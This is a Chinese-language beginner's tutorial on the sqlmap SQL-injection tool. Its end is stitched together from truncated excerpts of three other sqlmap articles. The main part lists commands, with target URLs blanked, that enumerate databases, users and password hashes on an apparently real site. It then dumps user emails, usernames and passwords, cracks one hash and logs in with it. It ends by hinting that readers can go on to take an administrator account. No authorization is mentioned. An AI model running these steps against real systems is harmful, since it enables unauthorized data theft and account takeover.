本文僅獻給想學習滲透測試的sqlmap小白,大牛請繞過。
對於網路安全人員來說,掌握滲透工具的使用方法是一項必備的技能。然而,乙個沒有師傅帶領的小白在剛開始學習時,並不知道該如何入手進行滲透學習,所以本文旨在幫助這些小白入門。
sqlmap是一款非常強大的開源sql自動化注入工具,可以用來檢測和利用sql注入漏洞。它由python語言開發而成,因此執行需要安裝python環境。
既然本文是基礎教程,以下只寫工具的基本使用方法。
教程開始:
一、檢測注入點是否可用
c:\python27\sqlmap>python sqlmap.py -u ""
引數:-u:指定注入點url
結果:注入結果展示:
(1)注入引數id為get注入,注入型別有四種分別為:boolean-based blind、error-based、stacked queries、inline query。
(2)web伺服器系統為windows 2003 or xp
(3)web應用程式技術為:asp.net, microsoft iis 6.0
(4)資料庫型別為:sqlserver 2000
其中圖一有若干詢問語句,需要使用者輸入[y/n],如果你懶得輸入或者不懂怎麼輸入可以讓程式自動輸入,只需新增乙個引數即可,命令如下:
c:\python27\sqlmap>python sqlmap.py -u "" --batch
二、暴庫
一條命令即可曝出該sqlserver中所有資料庫名稱,命令如下:
c:\python27\sqlmap>python sqlmap.py -u "" --dbs
引數:--dbs:dbs前面有兩條槓,請看清楚。
結果:結果顯示該sqlserver中共包含7個可用的資料庫。
三、web當前使用的資料庫
c:\python27\sqlmap>python sqlmap.py -u "" --current-db
四、web資料庫使用賬戶
c:\python27\sqlmap>python sqlmap.py -u "" --current-user
五、列出sqlserver所有使用者
c:\python27\sqlmap>python sqlmap.py -u "" --users
六、資料庫賬戶與密碼
c:\python27\sqlmap>python sqlmap.py -u "" --passwords
七、列出資料庫中的表
c:\python27\sqlmap>python sqlmap.py -u "" -d tourdata --tables
引數:-d:指定資料庫名稱
--tables:列出表
結果:結果體現共列出了34張表。
八、列出表中字段
c:\python27\sqlmap>python sqlmap.py -u "" -d tourdata -t userb --columns
引數:-d:指定資料庫名稱
-t:指定要列出欄位的表
--columns:指定列出字段
結果:結果顯示該userb表中包含了23條欄位。
九、暴欄位內容
c:\python27\sqlmap>python sqlmap.py -u "" -d tourdata -t userb -c "email,username,userpassword" --dump
引數:-c :指定要暴的字段
--dump:將結果匯出
結果:如果字段內容太多,需要花費很多時間。可以指定匯出特定範圍的字段內容,命令如下:
c:\python27\sqlmap>python sqlmap.py -u "" -d tourdata -t userb -c "email,username,userpassword" --start 1 --stop 10 --dump
引數:--start:指定開始的行
--stop:指定結束的行
此條命令的含義為:匯出資料庫tourdata中的表userb中的字段(email,username,userpassword)中的第1到第10行的資料內容。
結果如下:
十、驗證結果
通過上圖結果看到其中的乙個使用者資訊為:
email:[email protected]
username: 1.asp
password: 49ba59abbe56e057
通過md5解密,得到該hash的原文密碼為:123456
拿到賬號密碼我們來測試是否可以登入,登入結果如下:
驗證成功!
當然我們只是拿到普通會員賬號進行登入,你也可以拿到管理員賬號進行登入,後面的事情自己發揮吧,嘿嘿!
滲透測試工具 sqlmap
簡單來說 乙個用來做sql注入攻擊的工具 2.配置環境變數 控制面板 系統和安全 系統 高階系統設定 環境變數 找到path 新建黏貼python位址 sqlmap支援五種不同的注入模式 1 基於布林的盲注,即可以根據返回頁面判斷條件真假的注入。2 基於時間的盲注,即不能根據頁面返回內容判斷任何資訊...
滲透測試工具SQLmap
一 簡介 sqlmap 是一款用 python 編寫的開源滲透測試工具,用來自動檢測和利用 sql 注入漏洞。二 windows 下安裝 2.1 安裝 python 環境 注 python 3.0會出錯 python 2.6 且 3.0 2.2 安裝 sqlmap 官方 2.3 配置 將解壓後的 s...
滲透測試工具之sqlmap
滲透測試是一種利用模擬黑客攻擊的方式來評估計算機網路系統安全效能的方法。滲透測試工具很多,其中sqlmap 是乙個開源的滲透測試工具,可以用來進行自動化的檢測,利用sql注入漏洞,獲取資料庫伺服器的許可權。它具有功能強大的檢測引擎,針對各種不同型別資料庫的滲透測試的功能選項,包括獲取資料庫中儲存的資...